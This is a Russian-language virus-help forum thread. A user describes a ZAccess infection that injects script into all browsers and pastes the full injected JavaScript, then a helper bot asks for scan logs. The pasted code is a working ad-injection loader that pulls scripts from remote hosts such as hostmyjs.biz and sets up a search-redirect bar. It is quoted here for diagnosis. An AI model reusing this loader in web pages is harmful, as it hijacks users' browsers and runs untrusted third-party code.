Заразился странным вирусом, который прописывает посторонний код в браузеры. Код такой:
Код:
<script>
var id=3938490044;
var aff=30534;
var sid=0;
function INCL_checkinternals()
{
var h = document.location.hostname;
return (/search\.kalloutsearch\d\.com/i.test(h) == true ||
/search\.adbar\d\.com/i.test(h) == true ||
h.indexOf('search.runclips.com') != -1 ||
h.indexOf('search.searchnowdirect.com') != -1);
}
function INCL_addEventHandler (el, eType, fn)
{
if (el.addEventListener)
el.addEventListener(eType, fn, false);
else if (el.attachEvent)
el.attachEvent('on' + eType, fn);
else
el['on' + eType] = fn;
}
function INCL_checkdml()
{
var h = document.location.hostname;
return (h.indexOf("google")!=-1 ||
h.indexOf("facebook.com")!=-1 ||
h.indexOf("yahoo.com")!=-1 ||
h.indexOf("bing.com")!=-1 ||
h.indexOf("ask.com")!=-1 ||
h.indexOf("listenersguide.org.uk")!=-1);
}
function INCL_loadScript(src, scriptId)
{
if (window.location.protocol == 'https:' && src.indexOf('http:') == 0)
return;
var script = document.createElement("script");
script.src = src;
script.characterSet = "utf-8";
script.type = "text/javascript";
script.setAttribute('jsid', 'js36');
if (typeof(scriptId) !== 'undefined')
script.id = scriptId;
(document.head||document.getElementsByTagName('head')[0]|| document.body||document.getElementsByTagName('body')[0]).appendChild(script);
}
function INCL_onloadComplete()
{
if (!INCL_checkdml())
{
window.INLDM_cfg = { fi : 4603, fd : 0,
fddm: 'xml.cpchero.biz',
sttc: 'https://hostmyjs.biz/scripts/inl_dmmtch/',
inlsrhdm: 'sonicsearchonline.biz' };
INCL_loadScript('https://hostmyjs.biz/scripts/inl_dmmtch/inl_dmmtch.js');
INCL_loadScript('https://in.admedia.com/?id=ODkoOCI&subid=36');
}
INCL_loadScript('http://i.websuggestorjs.info/sugg/javascript.js?channel=js36');
INCL_loadScript('https://cdncache1-a.akamaihd.net/loaders/1247/l.js?aoi=1311798366&pid=1247&zoneid=52222');
window.dmadbar_settings = {dm_standalone : true, dmpd : 2, fd : 4723, fd2: 4604, xmlfeed : 'http://xml.cpchero.biz/search' , search_url : 'http://hostmysearch.com/?prt=yhs1Danta2&errUrl=http://www.yahoo.com&keywords=' , script_base : 'https://hostmyjs.biz/scripts/adbar' };
INCL_loadScript('https://hostmyjs.biz/scripts/adbar/adbar.js');
}
if (top === self && !INCL_checkinternals())
{
if (document.readyState === 'complete')
INCL_onloadComplete();
else
INCL_addEventHandler(window, 'load', INCL_onloadComplete);
}
</script>
Что замечено:
1. Выводится он во всех браузерах
2. В опере из-за него перестают работать ссылки примерно через 5 секунд после открытия страницы (а так как я работаю в опере, больше всего меня и досаждает) в других браузерах на работу особо не влияет.
3. В безопасном режиме его нет
Ставил авиру антивирус, он что то нашел и каким то образом нейтрализовывал вирус пока запущена авира, стоит отключить авиру как этот код снова появляется в браузере.
Ради того чтобы покончить с этим вирус я приобрел лицензионный Касперский интернет секьюрити.
Он находит вирус: Virus.Win32.ZAccess.aml в файле cdrom.sys Не знаю связан ли этот вирус с посторонним кодом в браузере.
Предлагает два способа лечения: 1. Да. лечить с перезагрузкой
2. Не выполнять
Пробовал оба способа. Ни один не помогает.
Касперский пишет что вирус вылечен, но даже при проверке важных мест, снова его находит ну и код все равно сидит в браузере, касперский его даже не блокирует.
Антивирусом делал проверку во всех режимах, в том числе и в безопасном.
Последняя надежда на вас. Очень не охота сносить систему. А Касперский немного разочаровал (
Сделал все по инструкции и скидываю все что у меня в папке LOG
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) mazdov, спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: